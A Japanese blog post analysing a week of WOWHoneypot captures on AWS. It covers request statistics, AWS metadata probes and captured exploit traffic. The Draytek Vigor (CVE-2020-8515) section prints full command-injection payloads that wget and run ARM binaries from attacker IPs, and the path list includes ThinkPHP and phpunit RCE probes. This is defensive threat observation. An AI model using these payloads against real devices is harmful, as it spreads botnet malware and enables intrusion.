■経緯
OSCP取得から、かなり気持ち的にも余裕が出てきたので。
如何せんはじめてなもので、色々ググりました。
AWSでT-Potから始めてもよかったんだが、若干コストがかかる感じだったので、
スモールスタートということでWOWHoneypotを使うこととしました。
WOWHoneypotといえば、ハニーポッターの著書でおなじみのmorihisaさんが初心者向けに作成されたもので、githubにて公開されています。
https://github.com/morihisa/WOWHoneypot
AWSでアカウント登録することで得られる無料枠を利用して、こちらのWOWHoneypotを設置していくこととしました。
設置については他の方々がブログで詳細に分かりやすく解説されているので、ググって参考にしていただければと思います。
インスタンスのリージョンは無難に東京としました。
■捕捉状況
5/4〜5/9までの捕捉状況です。
日別
131 : 2020-05-06 126 : 2020-05-09 112 : 2020-05-08 104 : 2020-05-07 98 : 2020-05-05 53 : 2020-05-04 total : 624
送信元別 (上位10)
48 : 205.185.123.189 45 : 44.225.84.206 45 : 44.224.22.196 45 : 103.40.102.148 19 : 5.101.0.209 16 : 195.54.160.121 14 : 77.247.108.77 10 : 173.212.213.46 9 : 154.113.16.226 9 : 62.234.81.215
ユーザエージェント別 (上位20)
60 : AWS Security Scanner 45 : Mozilla/3.0 (compatible; Indy Library) 35 : Mozilla/5.0 zgrab/0.x 35 : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 29 : Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) 24 : Python-urllib/2.7 22 : Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 19 : Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 19 : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7 18 : Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; hxxp://cloudsystemnetworks.com) 17 : Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 14 : python-requests/2.21.0 13 : masscan/1.0 (hxxps://github.com/robertdavidgraham/masscan) 13 : Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 13 : Go-http-client/1.1 12 : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 12 : ZmEu 10 : Mozilla/5.0 8 : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 5 : XTC
283 : / 70 : /manager/html 24 : /is_test 12 : /latest/dynamic/instance-identity/document 9 : /TP/public/index.php 9 : /hudson 8 : /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 8 : /TP/public/index.php?s=captcha 8 : /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 6 : hxxp://example.com/ 6 : hxxp://169.254.169.254/ 6 : hxxp://[::ffff:a9fe:a9fe]/ 6 : hxxp://169.254.169.254/latest/dynamic/instance-identity/document 6 : hxxp://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document 6 : /logs 6 : /editConfig?returnUrl=/ 6 : /cgi-bin/mainfunction.cgi 6 : hxxp://checkip.amazonaws.com/ 6 : checkip.amazonaws.com:443 5 : [自サーバIP]:80
各検知数を載せたところで少し面白くないので、
気になったものをいくつかピックアップしていきます。
取り上げたいものが多いので数絞って残りはまた今度とする。
■ AWS Security Scanner、悪意ある?ない?
検知日数:
5/4〜5/6 (ハニポ開始直後の3日間)
User-Agent:
60 : AWS Security Scanner
Request URL:
12 : /latest/dynamic/instance-identity/document 6 : hxxp://169.254.169.254/ 6 : hxxp://[::ffff:a9fe:a9fe]/ 6 : hxxp://169.254.169.254/latest/dynamic/instance-identity/document 6 : hxxp://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document 6 : hxxp://checkip.amazonaws.com/ 6 : checkip.amazonaws.com:443
送信元IPアドレス
45 : 44.225.84.206 45 : 44.224.22.196
最初の3日間だけ検知していたAWS Security Scannerによるアクセス。
送信元は上記の2件からのみでキリよく45件ずつ。
そしてWebサーバのIPアドレスやAWSのメタデータを取得するためのURLに対するリクエストがきれいに6件ずつきている。
これはAWSにインスタンス立てたときに来るお決まりのものなのか?笑
ただ去年くらいにCapital Oneの情報流出の事件は、SSRF攻撃 (サーバサイドリクエストフォージェリ)の手法を用いてAWSのメタデータが取得され、結果としてS3へのアクセスを許し情報流出につながった。
確かそんな事件だった気がするが、AWSのメタデータが取得されることはこの事件からも恐ろしさがわかるので気をつけないといけない。
■Draytek Vigorデバイスの脆弱性(CVE-2020-8515)を狙った通信
User-Agent:
5 : XTC
Request URL:
6 : /cgi-bin/mainfunction.cgi
POST data:
action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://176.123.3.96/arm7${IFS}-O${IFS}/tmp/upnp.debug;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug;${IFS}/tmp/upnp.debug'%0A%27&loginUser=a&loginPwd=a action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://212.114.52.128/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'%0A%27&loginUser=a&loginPwd=a action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://178.33.64.107/arm7${IFS}-O${IFS}/tmp/upnp.debug;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug;${IFS}/tmp/upnp.debug'%0A%27&loginUser=a&loginPwd=a action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://178.33.64.107/arm7${IFS}-O${IFS}/tmp/upnp.debug;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug;${IFS}/tmp/upnp.debug'%0A%27&loginUser=a&loginPwd=a action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'wget${IFS}hxxp://178.33.64.107/arm7${IFS}-O${IFS}/tmp/upnp.debug;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug;${IFS}/tmp/upnp.debug'%0A%27&loginUser=a&loginPwd=a
2020年2月ごろに公開されたDraytek Vigorデバイスの脆弱性を狙った通信です。
XTCはボットネットに関連するユーザエージェントのようで、Mirai亜種での活動でも確認されたことがあるようですね。(Threat post以外のソースが見つかりませんが。)
PaloAlto社のunit42ブログでもこれらのリクエストに関連する記事が書かれていますね。
https://unit42.paloaltonetworks.jp/new-hoaxcalls-ddos-botnet/
この記事でDraytek Vigorデバイスを狙った通信について言及されていますが、並行してGrandstream UCM6200の脆弱性(CVE-2020-5722)を狙った攻撃についても触れられています。
ExploitDatabaseで調べたところUCM6200のRCEのPoC(https://www.exploit-db.com/exploits/48247)もあり、私のハニーポットでもどうやら検知しているようでした。
GET /cgi?action=getInfo HTTP/1.1
該当期間のうち検知は2件だけでしたが。
■ まとめ
今日はこれくらいにしておきます。
やっぱりいろいろホイホイ捕まってるのを観察しているのは楽しいですね。
ThinkPHPとかTomcatとか見慣れたものを検知しておりますが、また今度に。
今後は日次の検知数だけでも更新していくか、週次の方がやりやすいのか。まぁ気軽にやっていきます。